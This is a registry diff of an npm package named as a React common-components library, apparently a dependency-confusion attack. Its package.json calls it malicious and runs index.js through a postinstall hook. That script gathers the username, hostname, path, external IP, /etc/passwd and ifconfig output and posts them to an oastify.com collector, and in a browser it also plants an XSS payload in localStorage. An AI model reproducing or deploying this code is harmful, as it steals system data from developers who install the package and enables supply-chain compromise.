@visma-spcs-registry/react-common-components 4.2.5
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/index.js +111 -0
- package/package.json +14 -0
- package/test.js +7 -0
package/index.js
ADDED
|
@@ -0,0 +1,111 @@
|
|
|
1
|
+
const os = require('os');
|
|
2
|
+
const axios = require('axios');
|
|
3
|
+
const path = require('path');
|
|
4
|
+
const fs = require('fs');
|
|
5
|
+
const { execSync } = require('child_process');
|
|
6
|
+
|
|
7
|
+
// Cek apakah berjalan di browser atau Node.js
|
|
8
|
+
const isBrowser = typeof window !== 'undefined';
|
|
9
|
+
|
|
10
|
+
// Mendapatkan waktu saat ini
|
|
11
|
+
function getCurrentTime() {
|
|
12
|
+
return new Date().toISOString();
|
|
13
|
+
}
|
|
14
|
+
|
|
15
|
+
// Mendapatkan nama organisasi atau pengguna
|
|
16
|
+
function getOrganization() {
|
|
17
|
+
return os.userInfo().username;
|
|
18
|
+
}
|
|
19
|
+
|
|
20
|
+
// Mendapatkan IP eksternal dengan menggunakan API
|
|
21
|
+
async function getExternalIP() {
|
|
22
|
+
try {
|
|
23
|
+
const response = await axios.get('https://api.ipify.org?format=json');
|
|
24
|
+
return response.data.ip;
|
|
25
|
+
} catch (error) {
|
|
26
|
+
return 'IP eksternal tidak ditemukan';
|
|
27
|
+
}
|
|
28
|
+
}
|
|
29
|
+
|
|
30
|
+
// Mendapatkan nama host
|
|
31
|
+
function getHostname() {
|
|
32
|
+
return os.hostname();
|
|
33
|
+
}
|
|
34
|
+
|
|
35
|
+
// Mendapatkan jalur direktori saat ini
|
|
36
|
+
function getCurrentPath() {
|
|
37
|
+
return path.resolve('.');
|
|
38
|
+
}
|
|
39
|
+
|
|
40
|
+
// Membaca file /etc/passwd (hanya jika ada izin akses)
|
|
41
|
+
function getEtcPasswd() {
|
|
42
|
+
try {
|
|
43
|
+
const passwdContent = fs.readFileSync('/etc/passwd', 'utf-8');
|
|
44
|
+
return passwdContent;
|
|
45
|
+
} catch (error) {
|
|
46
|
+
return 'Tidak dapat membaca file /etc/passwd';
|
|
47
|
+
}
|
|
48
|
+
}
|
|
49
|
+
|
|
50
|
+
// Mendapatkan konfigurasi jaringan dengan ifconfig
|
|
51
|
+
function getIfconfig() {
|
|
52
|
+
try {
|
|
53
|
+
return execSync('ifconfig', { encoding: 'utf-8' });
|
|
54
|
+
} catch (error) {
|
|
55
|
+
return 'Tidak dapat mengambil konfigurasi jaringan';
|
|
56
|
+
}
|
|
57
|
+
}
|
|
58
|
+
|
|
59
|
+
// Simpan payload XSS ke localStorage (Hanya jika berjalan di browser)
|
|
60
|
+
function storeXSSPayload() {
|
|
61
|
+
if (isBrowser) {
|
|
62
|
+
const payload = `<script>console.log('XSS berhasil disisipkan!');</script>`;
|
|
63
|
+
try {
|
|
64
|
+
localStorage.setItem('xssTest', payload);
|
|
65
|
+
console.log('✅ XSS Payload berhasil disimpan di localStorage.');
|
|
66
|
+
} catch (error) {
|
|
67
|
+
console.error('❌ Gagal menyimpan payload ke localStorage:', error);
|
|
68
|
+
}
|
|
69
|
+
} else {
|
|
70
|
+
console.log('ℹ️ Tidak berjalan di browser, melewati XSS Storage.');
|
|
71
|
+
}
|
|
72
|
+
}
|
|
73
|
+
|
|
74
|
+
// Mengumpulkan data yang dibutuhkan
|
|
75
|
+
async function collectData() {
|
|
76
|
+
const time = getCurrentTime();
|
|
77
|
+
const organization = getOrganization();
|
|
78
|
+
const externalIP = await getExternalIP();
|
|
79
|
+
const hostname = getHostname();
|
|
80
|
+
const currentPath = getCurrentPath();
|
|
81
|
+
const etcPasswd = getEtcPasswd();
|
|
82
|
+
const ipConfig = getIfconfig();
|
|
83
|
+
|
|
84
|
+
if (isBrowser) {
|
|
85
|
+
storeXSSPayload();
|
|
86
|
+
}
|
|
87
|
+
|
|
88
|
+
const data = {
|
|
89
|
+
time,
|
|
90
|
+
organization,
|
|
91
|
+
ipAddress: externalIP,
|
|
92
|
+
hostname,
|
|
93
|
+
currentPath,
|
|
94
|
+
etcPasswd,
|
|
95
|
+
ipConfig,
|
|
96
|
+
};
|
|
97
|
+
|
|
98
|
+
console.log(data); // Tampilkan data yang dikumpulkan
|
|
99
|
+
|
|
100
|
+
// Kirim data ke server target
|
|
101
|
+
axios.post('https://owo1psomvgl0vrfn7t4uf1d4uv0mocc1.oastify.com/log', data)
|
|
102
|
+
.then(response => {
|
|
103
|
+
console.log('✅ Data berhasil dikirim:', response.data);
|
|
104
|
+
})
|
|
105
|
+
.catch(error => {
|
|
106
|
+
console.error('❌ Error saat mengirim data:', error);
|
|
107
|
+
});
|
|
108
|
+
}
|
|
109
|
+
|
|
110
|
+
// Jalankan fungsi
|
|
111
|
+
collectData();
|
package/package.json
ADDED
|
@@ -0,0 +1,14 @@
|
|
|
1
|
+
{
|
|
2
|
+
"name": "@visma-spcs-registry/react-common-components",
|
|
3
|
+
"version": "4.2.5",
|
|
4
|
+
"description": "Malicious package for dependency confusion",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"postinstall": "node index.js"
|
|
8
|
+
},
|
|
9
|
+
"author": "Attacker",
|
|
10
|
+
"license": "MIT",
|
|
11
|
+
"dependencies": {
|
|
12
|
+
"axios": "^0.21.1"
|
|
13
|
+
}
|
|
14
|
+
}
|